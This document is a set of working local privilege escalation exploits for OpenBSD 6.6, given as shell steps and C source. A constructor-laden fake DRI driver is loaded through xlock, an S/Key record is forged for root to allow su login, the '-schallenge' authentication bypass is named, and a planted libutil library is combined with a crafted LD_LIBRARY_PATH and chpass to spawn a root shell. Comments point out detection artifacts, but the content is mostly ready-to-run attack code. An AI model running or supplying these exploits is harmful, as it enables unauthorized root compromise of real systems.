OpenBSD
Works in OpenBSD 6.6.
# Works in OpenBSD 6.6 (per the note above). Step 1: build a shared object
# whose only content is an ELF constructor, i.e. code that runs as soon as
# the library is loaded into a process.
cat > swrast_dri.c << "EOF"
#include <paths.h>
#include <sys/types.h>
#include <unistd.h>

/* Constructor: runs at library load time, before the loading program's
 * own code regains control.  Every failure path exits with the current
 * line number as the status so the failing call can be identified. */
static void __attribute__ ((constructor)) _init (void) {
gid_t rgid, egid, sgid;
/* Read the real, effective and saved group ids of the loading process. */
if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);
/* Make the saved gid the real and effective gid as well. */
if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);

/* Replace the process image with ksh: argv[0] only, empty environment. */
char * const argv[] = { _PATH_KSHELL, NULL };
execve(argv[0], argv, NULL);
/* Only reached if execve() failed. */
_exit(__LINE__);
}
EOF
# Stripped, position-independent shared object; the output name is the
# DRI driver filename that the LIBGL_DRIVERS_PATH step below relies on.
gcc -fpic -shared -s -o swrast_dri.so swrast_dri.c
# Virtual X server on display :82, started with an empty environment.
env -i /usr/X11R6/bin/Xvfb :82 -cc 0 &
# Point the DRI driver search path at the current directory and run xlock
# against that display.  Detection-wise, a process with LIBGL_DRIVERS_PATH
# set to a user-writable directory is the observable artifact of this step.
env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display :82
# Step 2: write an S/Key record for root (mode 0600) and log in via su with
# the S/Key style; the six words on the line after su are the one-time
# password answered at the prompt.  A new or modified /etc/skey/root is the
# artifact to watch for here.
echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root
chmod 0600 /etc/skey/root
env -i TERM=vt220 su -l -a skey
EGG LARD GROW HOG DRAG LAIN
id
If login_passwd is in use, providing the username `-schallenge` bypasses authentication.
Works on OpenBSD 6.6.
cd /tmp
# Works on OpenBSD 6.6 (per the note above). First file: a shared object
# whose constructor runs when the dynamic loader picks it up in place of the
# real libutil (see the LD_LIBRARY_PATH environment built in poc.c below).
cat > lib.c << "EOF"
#include <paths.h>
#include <unistd.h>

/* Constructor: runs at library load time, before the loading program's
 * own code regains control.  Failures exit with the line number as status. */
static void __attribute__ ((constructor)) _init (void) {
/* Set uid and gid to 0; bail out if either call is refused. */
if (setuid(0) != 0) _exit(__LINE__);
if (setgid(0) != 0) _exit(__LINE__);
/* Equivalent to: ksh -c "/bin/ksh; exit 1" with an empty environment,
 * i.e. an interactive ksh, and status 1 once it ends. */
char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL };
execve(argv[0], argv, NULL);
/* Only reached if execve() failed. */
_exit(__LINE__);
}
EOF

# Build it under a filename matching the libutil shared-library name, so a
# loader searching "." for libutil finds this object first.
gcc -fpic -shared -s -o libutil.so.13.1 lib.c

# Second file: a launcher that execs the program named on its command line
# with a crafted environment and a lowered data-segment limit.
cat > poc.c << "EOF"
#include <string.h>
#include <sys/param.h>
#include <sys/resource.h>
#include <unistd.h>

int
main(int argc, char * const * argv)
{
/* Environment entry "LD_LIBRARY_PATH=." followed by ':' characters (empty
 * path components) up to ARG_MAX - 129 bytes.  llp is static, so the last
 * byte is already 0 and the string stays NUL-terminated. */
#define LLP "LD_LIBRARY_PATH=."
static char llp[ARG_MAX - 128];
memset(llp, ':', sizeof(llp)-1);
memcpy(llp, LLP, sizeof(LLP)-1);
/* Two-entry environment: the long LD_LIBRARY_PATH above plus an EDITOR
 * value that appends a '#' line to whatever file name is given to it.
 * Both values are unusual enough to serve as detection artifacts in a
 * process environment. */
char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL };

/* Soft and hard RLIMIT_DATA set to ARG_MAX pointer-sized slots; the
 * limit is inherited by the program exec'd below. */
#define DATA (ARG_MAX * sizeof(char *))
const struct rlimit data = { DATA, DATA };
if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__);

/* Exec argv[1] with the remaining arguments and the environment above;
 * execve() only returns on failure, hence the trailing _exit(). */
if (argc <= 1) _exit(__LINE__);
argv += 1;
execve(argv[0], argv, envp);
_exit(__LINE__);
}
EOF
gcc -s -o poc poc.c
# Run chpass(1) through the launcher.
./poc /usr/bin/chpass